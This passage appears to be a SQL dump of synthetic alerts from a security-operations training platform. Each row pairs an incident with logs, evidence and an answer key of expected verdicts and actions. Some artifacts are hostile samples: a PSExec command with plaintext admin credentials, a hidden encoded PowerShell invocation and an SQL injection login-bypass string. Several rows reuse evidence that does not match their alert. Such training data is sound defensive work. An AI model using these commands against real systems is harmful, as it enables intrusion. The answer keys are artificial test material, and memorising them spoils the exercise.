'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:31:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 
192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:30:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:29:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:28:22.284Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.112\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-SERVER\\\",\\\"failed_attempts\\\":30}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(642, 'Suspicious Network Connection to Known C2 Server', 'critical', 'Firewall', 'A suspicious outbound network connection was detected from an internal host to a known command and control server.', 'Malware', 'T1105', 1, 'investigating', 74, '{\"timestamp\":\"2026-01-11T12:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"203.0.113.99\",\"username\":\"svc_account\",\"hostname\":\"INFECTED-PC\"}', '2026-01-10 18:01:00', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP recognized as a command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The destination IP is known for C2 activity, confirming the presence of malware on the host.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(643, 'False Positive: User Access from Known Location', 'low', 'Splunk', 'A login attempt was flagged as suspicious due to an unexpected geographic location, but further analysis indicates it is a legitimate access from a known user.', 'Brute Force', 'T1078', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-11T13:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.0.15\",\"username\":\"mike\",\"hostname\":\"VPN-SERVER\"}', '2026-01-10 04:02:31', '2026-03-09 02:47:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with legitimate user access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mike\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User verified as legitimate employee with known travel history.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was from a known user and location, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.286Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.50\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"mike\\\",\\\"hostname\\\":\\\"VPN-SERVER\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(644, 'Unauthorized Remote Access Tool Detected', 'high', 'EDR', 'An unauthorized remote access tool was detected running on a corporate workstation, indicating potential compromised access.', 'Malware', 'T1219', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"203.0.113.88\",\"username\":\"lisa\",\"hostname\":\"WORK-PC-01\",\"command_line\":\"C:\\\\Program Files\\\\RAT\\\\rat.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 11:34:49', '2026-02-18 13:55:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as a remote access trojan\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with malicious remote access activity\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and associated IP are known indicators of a remote access trojan.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(645, 'Data Exfiltration Attempt via Email', 'critical', 'Email Gateway', 'Sensitive data was detected in an outgoing email, indicating a potential data exfiltration attempt.', 'Data Exfil', 'T1020', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T12:45:00Z\",\"event_type\":\"email_sent\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"203.0.113.101\",\"username\":\"alice\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"alice@company.com\",\"email_recipient\":\"external@unknown.com\",\"file_attachment\":\"confidential_data.pdf\",\"file_hash\":\"def4567890abcdef1234567890abcdef\"}', '2026-01-11 00:45:12', '2026-02-16 18:03:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"external@unknown.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized external recipient\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"def4567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash flagged for containing sensitive data\"}}],\"expected_actions\":[\"block_sender\",\"quarantine_email\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The email contains sensitive data and was sent to an unrecognized recipient, indicating data exfiltration.\"}', 'Beginner', 'DLP', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Data Exfiltration Attempt via Email\",\"date\":\"2026-02-01T20:32:22.288Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(646, 'False Positive: Legitimate Application Update', 'low', 'EDR', 'A process execution alert was triggered for a legitimate application update process.', 'Malware', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-11T15:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"10.0.0.20\",\"username\":\"system\",\"hostname\":\"UPDATE-SERVER\",\"command_line\":\"C:\\\\Program Files\\\\App\\\\update.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-01-09 22:44:23', '2026-03-07 05:19:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash matches legitimate application update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\App\\\\update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Confirmed as part of legitimate application update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution is part of a verified application update, confirming it as a false positive.\"}', 'Beginner', 'EDR', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(647, 'Lateral Movement Detected via PSExec', 'critical', 'SIEM', 'Lateral movement was detected within the network using PSExec from one internal host to another, indicating potential compromise.', 'Lateral Movement', 'T1569', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"192.168.1.70\",\"username\":\"administrator\",\"hostname\":\"COMPROMISE-PC\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\"}', '2026-01-10 01:41:05', '2026-02-16 18:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of potentially compromised host initiating lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP of targeted host for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command used for unauthorized lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec to execute commands remotely indicates malicious lateral movement.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(648, 'False Positive: Unusual Login from Expected Location', 'low', 'Firewall', 'An unusual login was flagged due to an unexpected IP, but the user confirmed it was a legitimate access from a known location.', 'Brute Force', 'T1078', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-11T16:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.75\",\"dst_ip\":\"10.0.0.25\",\"username\":\"susan\",\"hostname\":\"CORP-SERVER\"}', '2026-01-09 21:55:34', '2026-03-07 05:18:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address associated with legitimate user access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"susan\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User confirmed access from known location\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was verified by the user as legitimate, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(649, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A potentially malicious PowerShell script was executed on the endpoint, indicating possible malware activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AdQBtAGUAcgBpAGMAcwBdADoAOgBuAG8AcgBtADAANABdAC0A\"}', '2026-01-10 16:38:54', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AdQBtAGUAcgBpAGMAcwBdADoAOgBuAG8AcgBtADAANABdAC0A\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PowerShell command used in known malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is encoded and matches known malicious patterns.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(650, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email containing a malicious link was received by user jsmith, potentially leading to credential theft.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:25:48Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"\",\"username\":\"jsmith\",\"hostname\":\"\",\"email_sender\":\"no-reply@fakebank.com\",\"url\":\"http://malicious-link.fakebank.com\"}', '2026-01-10 14:31:51', '2026-02-16 18:04:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to phishing site mimicking a banking login page\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain closely resembles a legitimate bank\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site mimicking a bank.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Link Detected\",\"date\":\"2026-02-01T20:32:22.294Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(651, 'SQL Injection Attempt on Web Application', 'high', 'Wazuh', 'An attacker attempted a SQL injection attack on the company\'s public web application, trying to access the database.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:13:09Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"\",\"hostname\":\"\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 04:54:32', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for SQL injection attacks\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a classic SQL injection pattern used to bypass login forms.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
